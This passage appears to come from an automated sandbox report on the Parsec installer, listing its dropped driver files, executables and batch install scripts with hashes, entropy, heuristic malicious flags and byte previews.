                            Preview:@echo off.@setlocal..set MYDIR=%~dp0.pushd "%MYDIR%"..start /wait .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318".start /wait .\nefconw.exe --uninstall-driver --inf-path ".\driver\mm.inf"..popd.endlocal.

                            C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):596352
                            Entropy (8bit):6.420504136477356
                            Encrypted:false
                            SSDEEP:12288:qmTp2f8iWOZiu7uRt3eWuHE0e14BdpfVuW70q2cJto9VuZHPq:nTp2f8iWOZiu7uRt3nIE0+4BdpfVuW7Q
                            MD5:DDDEE00430F7A3D52580B7C85D63D9DC
                            SHA1:FF3B7A60062EF85186EA305168CC9BC207A0C5B0
                            SHA-256:002CBD46BBFAA2D9E04A578F7200711B5740BDA119166F111E2590D8B19D3E68
                            SHA-512:FAAC2F9135AA58DDAB6391D4711498A45F51A0429040833AEA8D1F0F7C64EF27435C8A2D9C3E49C8BC8BDFEC276CA455A719E2B401EA34994D57483C8FEFE5BA
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|.8..ek..ek..ek.efj..ek.e`jy.ek.eaj..ek.haj..ek.hfj..ek.h`j..ek.h`j..ek.edj..ek..dkl.ek.hlj..ek.h.k..ek...k..ek.hgj..ekRich..ek........PE..d....d.........."......Z...........n.........@.............................p............`..................................................>.......@..x........I.......)...P..........8.......................(.......8............p..0............................text....Y.......Z.................. ..`.rdata..~....p.......^..............@..@.data....?...`...&...@..............@....pdata...I.......J...f..............@..@.detourc.!......."..................@..@.detourd..... ......................@..._RDATA.......0......................@..@.rsrc...x....@......................@..@.reloc.......P......................@..B................................................................................................................

                            C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):588160
                            Entropy (8bit):6.412426868092969
                            Encrypted:false
                            SSDEEP:12288:o27GX/DYwTLMcdMcYsWpP86/6L94gsleElgEo0JFoG:o27GX/DYwTLMcdMcYtF8S6L94gslbOED
                            MD5:E9F2BC8C82AC755F47C7F89D1530F1A1
                            SHA1:7CE5938C4B8A3EB4DE49F7A7E34972F5F2ACFCB5
                            SHA-256:CF746D1B0BBB713993D4A90DCCD774C78D9FFF8C2BA5A054B6C8F56C77E1EEE1
                            SHA-512:86ED0A391D22631DA9BDC7EB9CB096BA4DE4C6619C6C4326030CB03D196B63E5AA156BAC264A48D5B4CDA7401844A3B5050259B41859D32E0C4D39B96913C2CE
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}B..9#f.9#f.9#f.r[e.3#f.r[c.#f.r[b.*#f.kVb.(#f.kVe.3#f.kVc.k#f..Vc.:#f.r[g.6#f.9#g.#f..Vo.=#f..V..8#f.9#..8#f..Vd.8#f.Rich9#f.................PE..d......d.........."......@...........f.........@.............................@......}.....`.............................................................x....p...I.......)... .......v..8....................x..(....v..8............P..8............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data....?...0...&... ..............@....pdata...I...p...J...F..............@..@.detourc.!......."..................@..@.detourd............................@..._RDATA..............................@..@.rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................

                            C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.cat

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11858
                            Entropy (8bit):7.334407083811773
                            Encrypted:false
                            SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                            MD5:560EFA3FA6E5AB486D958B12207AC6ED
                            SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                            SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                            SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                            Malicious:false
                            Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...

                            C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.inf

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                            C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):26680
                            Entropy (8bit):6.39482709996269
                            Encrypted:false
                            SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                            MD5:0790B2E5B9D6B38B566C6BC796F0364A
                            SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                            SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                            SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................

                            C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.cat

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12001
                            Entropy (8bit):7.346082125667387
                            Encrypted:false
                            SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                            MD5:CFE9C8FD6FAF915A653D39895D3D0862
                            SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                            SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                            SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b

                            C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.inf

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                            C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):263336
                            Entropy (8bit):6.416646624342821
                            Encrypted:false
                            SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                            MD5:591AB089C7184E33D0F4DB12B4CA5498
                            SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                            SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                            SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................

                            C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):104208
                            Entropy (8bit):7.574113550215517
                            Encrypted:false
                            SSDEEP:3072:hbG7N2kDTHUpouC0NIHo0Ym9eyOEn/y0PwqVMARM:hbE/HU60uI0YAOE/y0mARM
                            MD5:B28AE314664A7E74B8A7A83DF3002539
                            SHA1:3043970C1DA7412C4CE0CCEF44E51AB0698A338B
                            SHA-256:FA1BF84A9D14DC4026ACF706539282F5E3FE1898AF24A2465B6837903FD0158C
                            SHA-512:A36F257A455D2536E7CE3C493745284F0878DC874DCE99D4BC4778A058C7E2EDD67BD21776C7386E36D71FE00BAD1B495F6FF0CEC5838ABFB55EA3D12E8AC10D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................t.....@..........................................................m...)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                            C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):327
                            Entropy (8bit):4.820064645392393
                            Encrypted:false
                            SSDEEP:6:xzKmgiItAnsKg9r/zITrId6T6UilzKmXBux3jwXvL+Hvt0zKmtcowXMEfsE1:xzAiI+sKg9bzITcdRfz3ajwXDQ0zN1wh
                            MD5:3B3CA1091EB59F0FA9ED9C9A50B3BF81
                            SHA1:BD3A9CCCD279E4FFF79AE840D6397B1E8AB8CBA0
                            SHA-256:94EE200CA574DD4499779048DB279264C872833C96A500E0F49B1342EE5F4802
                            SHA-512:8F86DB66C0BFC7E043EED738CF026ACF6AEAD862410A17FE02A2E26FDEB77B59A1162B1D67868A428F9B0C604A31963CBA8EF534B25AF1BC60448424CA6CCD1B
                            Malicious:false
                            Preview:start /wait nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000".start /wait nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf".start /wait nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf".

                            C:\Program Files\Parsec Virtual USB Adapter Driver\vusbuninstall.bat

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):312
                            Entropy (8bit):4.829934939966026
                            Encrypted:false
                            SSDEEP:6:xzKmuIUiItAnsKS/sWITrId6T63zKm6Bux3jwXvL+Hvt0zKmtcPwXMEfsE1:xznUiI+sK0sWITcdR3zaajwXDQ0zNOwh
                            MD5:8E8F18F9109FCC7B93B2770BE222FA53
                            SHA1:E49D59E3161E33DE73D96AD95B41A1EA979C5C06
                            SHA-256:E5A72F8064DE9B266CED03C042DAEF6BA9682CF0BA66BF8236E30E6169E88F0E
                            SHA-512:26402EC20431AC71469B6F886C00183A30F2E8F5009004B9BAD54C5A6AFDEA88AAA56E567CE048A35A76655F9AAA8D86CF69A35AA951786F8A0DA933B7F311C5
                            Malicious:false
                            Preview:start /wait nefconw.exe --remove-device-node --hardware-id Root\Parsec\VUSBA --class-guid 36fc9e60-c465-11cf-8056-444553540000.start /wait nefconw.exe --uninstall-driver --inf-path ".\parsecvusba\parsecvusba.inf".start /wait nefconw.exe --inf-default-uninstall --inf-path ".\parsecvirtualds\parsecvirtualds.inf".

                            C:\Program Files\Parsec\parsecd.exe

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):465792
                            Entropy (8bit):5.186344682321096
                            Encrypted:false
                            SSDEEP:6144:rkdyuNAbS9p400tm61bXdCwx+3y6kR1DnjvGms7X5od0:rkUuNAbS9p9cx1rdCwh6+/+msjmd0
                            MD5:62BEB668110B4C5DDAD09BB20D921CB6
                            SHA1:F3706372C01D1E607FF8C605307DE6EF2C26C1A4
                            SHA-256:6F1BE9E26E403A885CC3B1FF0E4DBECBC96C0821119D25990C3E211564F215D5
                            SHA-512:8994C3F1C78B0A816ECF30E463AF8D6DDFD0A0CE7B962CBF13E9BBD360D37A024B8EE69C76745F4C332A4786DBFB9216667B1D03C32C60A7C06E85359A2186EE
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'...c.]c.]c.]j..]a.]...\b.]...\R.]c.]%.]...\..]...\d.]...\v.]1..\K.]1..\p.]1..\d.]...\C.]...\f.]..c]b.]c..]a.]...\b.]Richc.]........................PE..d.....7e.........."......J..........(..........@.............................P............`..................................................P...........n...............)...@......0...........................(...P...8............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....2...`.......L..............@....pdata...............Z..............@..@_RDATA...............x..............@..@.rsrc....n.......p...z..............@..@.reloc.......@......................@..B................................................................................................................................................................

                            C:\Program Files\Parsec\pservice.exe

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):418696
                            Entropy (8bit):4.95147545386253
                            Encrypted:false
                            SSDEEP:6144:qaoZkv+B1x9heMY32Z4iZDzDJGjvGms7X5Hm:4Zkv+B1x9cMu2ZzS+msjZ
                            MD5:46CD3FC327AF9109BD143BA7F16DF397
                            SHA1:53D2A6BCF0D21168050B852E287C2EF62F52F909
                            SHA-256:5A699A165838C739E449AC19A52E0A05B841BCEE1A27F7D348F0DD04C8E277A3
                            SHA-512:D6E35F0DD4F6EF259DD7040D80CD469F27EB460836A4C767D40678CE82B46CE4C38B329C0CF3B41236CEA2F0333F94669CFBEF05EF484D91035F52AD4C1A5CA3
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."R.tL..tL..tL......tL.2.J..tL.2.M..tL..tM..uL.2.I.TtL.2.O..tL.2.H..tL...I..tL...H..tL...O..tL.).H..tL.).D..tL.)....tL..t...tL.).N..tL.Rich.tL.........PE..d.....7e..........".................Pk.........@.....................................J....`.................................................L........0...f...........:...)..........Ld.......................f..(...pd..8...............@............................text... ........................... ..`.rdata..............................@..@.data...@2..........................@....pdata..............................@..@_RDATA....... ......................@..@.rsrc....f...0...h..................@..@.reloc...............2..............@..B................................................................................................................................................................................

                            C:\Program Files\Parsec\skel\appdata.json

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):155
                            Entropy (8bit):4.964195012666818
                            Encrypted:false
                            SSDEEP:3:3FFgNicHnIhoF1ExnRGTAWAJlBRoWdxETzqSHXCF8K/NkPUAA6An:3FFgN/HIaOxnR8VAPBRiqfGomTA6An
                            MD5:2C669AF7EE4ADEDDF72FA0102AA0378D
                            SHA1:5FCDF2480946EEF8F55DAA2DF5522508E45DECCD
                            SHA-256:CD5D52066766B7F0FD7222E551A96C539F17C72DEBD32F8DA9F76DF4627A6DD5
                            SHA-512:553CAECE520111CAB22BB8E92099A2976ACD7F2DC8C8766227F8D64259CC9E3104ADF1B10019B25EDB3A05B92A64AFE5466C661F88BF33F2ECACDA4FE6EDC32F
                            Malicious:false
                            Preview:{.. "entry_symbol": "wx_main",.. "hash": "b43debe8105cfd4e2c8f81599497ad4ad38640f19a64f9e530e7d2f64662bf6d",.. "so_name": "parsecd-150-93b.dll"..}

                            C:\Program Files\Parsec\skel\parsecd-150-93b.dll

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):3445128
                            Entropy (8bit):6.632135432033706
                            Encrypted:false
                            SSDEEP:49152:UWvLIUXeaP9CAYaXaAndGk4L8jTMFv43/ruceDSbsRCy9uzY9eQoYVe0OUrVxkov:0I0jNdLrpEeD+vqBlMe
                            MD5:1FF3E1349EDD37A206A97943731045C4
                            SHA1:6D1CFC0C0B26191385CB27149433E743B74D479A
                            SHA-256:B43DEBE8105CFD4E2C8F81599497AD4AD38640F19A64F9E530E7D2F64662BF6D
                            SHA-512:80F91692C22587E76E26C7CA38B267493D4598BCE75E284B3FEF4EF03C64EF8BA91D67BB7BE2BDDD9624E4AA52A67BDEB4B5EAC3A86A31529BB18C44F5824FE6
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...................................`...........!..L.!This program cannot be run in DOS mode....$...........Mx..Mx..Mx..D.Z.Ox......Lx.......x..Mx...z......x......lx......jx..Mx..Lx..K...+x..K...]x..K...[x......Nx......Nx.....Xx......Ax......Lx.......x..j...Gx.. ...xx.. ...5x.. ...Lx.. .6.Lx..Mx^.Ox.. ...Lx..RichMx..........PE..d...X..e.........." ...&.\....................................................5......4...`......................................... $/.h....$/......02..n....0.|1...h4..)....5.h....A-......................C-.(....@-.@............p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....1...`/..0...P/.............@....pdata..|1....0..2..../.............@..@.detourc.!....1.."....0.............@..@.detourd......2.......0.............@..._RDATA..0.... 2.......0.............@..@.rsrc....n...02..p....0.............@..@.reloc..h.....5......R4.............@..B........................

                            C:\Program Files\Parsec\teams.exe

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):350968
                            Entropy (8bit):5.604356925971176
                            Encrypted:false
                            SSDEEP:6144:GAR9duE83BYjyEbU1SDgFg8EwkSdbAxD22y6jvGmp:H9gp3WjyEbU1SDAgJw40c+mp
                            MD5:FAA24223985ABFBF64E4DDCD43F062D3
                            SHA1:E1374DC7C98405EFC5A44AA3229B97EABDD69BB2
                            SHA-256:6DC71B2E92B770DCFECA4A32C8F1787210311F731F1124754DF193EC22D5D13E
                            SHA-512:23324AFCB51508F5EA3F120A5787B150A8226D677C5A55FEF219674B4D619FD0D7300D2B4CAD917864D5F54788B9C8546DB2A77AA4F0D666A956014169C4A6C9
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{'Z\.I.\.I.\.I..hO.].I..hH.G.I.\.H...I..hL...I..hJ.[.I..hM.S.I..oL.t.I..oM.O.I..oJ.[.I..oM.I.I..o..].I.\...].I..oK.].I.Rich\.I.........................PE..d.....bb.........."......`..........@t.........@....................................V.....`.................................................tM..x.......0....... ....:... ......................................(.......8............p..P............................text... _.......`.................. ..`.rdata.......p.......d..............@..@.data...h/...`.......N..............@....pdata.. ............\..............@..@_RDATA...............z..............@..@.rsrc...0............|..............@..@.reloc...............2..............@..B................................................................................................................................................................................

                            C:\Program Files\Parsec\uninstall.exe

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):174136
                            Entropy (8bit):5.0044183901933215
                            Encrypted:false
                            SSDEEP:1536:Gg/T2X/jN2vxZz0DTHUpouk9pbZ3yFu1/s+ZLGmRTQ3E64xE+1x7wWNx:GgbG7N2kDTHUpoukTi+hGmRHxPxMW
                            MD5:FD4427B781E0DCB86E2FBC84BF000B36
                            SHA1:2A4F6C058D137F02D3A2E5D0A8E2A0A4C70EF81D
                            SHA-256:99864EAE2AD9B58075D0F4B2B3CF5B68BC35FE9E187B8695791F041C1335D5F1
                            SHA-512:EF593E0F7286ABFA1F0FE090CACAF4854F31B07E5A0DD39A87B87A4E28BFDC5A45A6A8406DF0578C503560BF5449CFDD65358EAA89C8E8BB7B64475E70DF09D3
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................... ............@..........................................P..X............~...)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...X....P......................@..@................................................................................................................................................................................................................................................................................................................................................

                            C:\Program Files\Parsec\vdd\parsec-vdd.exe

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):517256
                            Entropy (8bit):7.9435707600028005
                            Encrypted:false
                            SSDEEP:12288:QbLQNEFqf6MouZQqdF9zuAkDjdCjXHSZz2AKhAOYYA:QbUNEFKXrZ6ZjdFZxKhAOYv
                            MD5:4B9A3048286692A865187013B70F44E8
                            SHA1:EEFE91D9702314341ACCCD828FE4EDB6EE570D7B
                            SHA-256:E23332448FDAF5AA017CB308DB5EF6855FAC526A7DED05D80C039404126D5362
                            SHA-512:A38B9A0A1626D9F40FF2C718717A793108C7E773B25493CC53C595E6B9840CC4DE66587549F43CE00569B368834327184A90D55DA3C4AE0E269E1D0EDEF6238D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@..................................D....@..............................................................)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                            C:\Program Files\Parsec\vusb\parsec-vud.exe

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
